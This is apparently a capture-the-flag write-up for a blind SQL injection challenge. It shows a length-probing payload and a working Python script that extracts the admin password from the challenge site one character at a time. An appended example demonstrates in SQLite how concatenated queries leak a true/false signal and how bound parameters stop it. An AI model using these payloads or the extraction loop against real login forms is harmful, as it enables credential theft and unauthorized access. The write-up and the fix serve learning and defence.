
This is a blind SQL injection.
First, I used the length function to find the length of pw.
After entering pw='||length(pw)=8%23, I could see hello admin.

```python
import requests

# Session cookie for the logged-in LOS account
cookies = {'PHPSESSID': '7a4pokemhooffbduohsbglc420'}
url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?'
pw = ''

for i in range(1, 9):          # password positions 1..8
    for j in range(33, 127):   # printable ASCII candidates
        # %26%26 is URL-encoded &&; compare the first i characters of pw
        payload = "pw=' || id='admin' %26%26 substr(pw,1," + str(i) + ")='" + pw + chr(j) + "#"
        new_url = url + payload
        res = requests.get(new_url, cookies=cookies)
        res.raise_for_status()
        if "Hello admin" in res.text:
            pw += chr(j)
            print("pw: " + pw)
            break

print("pw : " + pw)
```
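The following is an added example, not part of the original post or the challenge's code: it shows why the page leaks a yes/no answer when the pw parameter is concatenated into the query, and why the same probes return nothing once the value is bound as a parameter. It assumes an in-memory SQLite database as a stand-in for MySQL (so `OR`/`AND`/`--` replace `||`/`&&`/`#`); the `users` table, the function names and the sample password are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data; the admin password is made up (8 characters).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT, pw TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("guest", "guest"), ("admin", "s3cr3tpw")])
    return db

def greet_concat(db, pw):
    # Vulnerable: the input becomes part of the SQL text, so quotes in it
    # change the WHERE clause.
    sql = "SELECT id FROM users WHERE id='guest' AND pw='" + pw + "'"
    row = db.execute(sql).fetchone()
    return f"Hello {row[0]}" if row else ""

def greet_bound(db, pw):
    # Hardened: the input is bound as a value and is never parsed as SQL.
    sql = "SELECT id FROM users WHERE id='guest' AND pw=?"
    row = db.execute(sql, (pw,)).fetchone()
    return f"Hello {row[0]}" if row else ""

# Same shape as the probes in the post, rewritten for SQLite syntax.
LENGTH_PROBE = "' OR id='admin' AND length(pw)=8 --"
PREFIX_PROBE = "' OR id='admin' AND substr(pw,1,1)='s"  # query supplies the closing quote

def answers_differ(greet, db):
    # Regression check: a true and a false condition must give the same page.
    # If they differ, the endpoint is a boolean oracle.
    yes = greet(db, "' OR id='admin' AND 1=1 --")
    no = greet(db, "' OR id='admin' AND 1=2 --")
    return yes != no

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concat", greet_concat), ("bound", greet_bound)):
        print(name, repr(fn(db, LENGTH_PROBE)), repr(fn(db, PREFIX_PROBE)),
              "oracle:", answers_differ(fn, db))
```
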

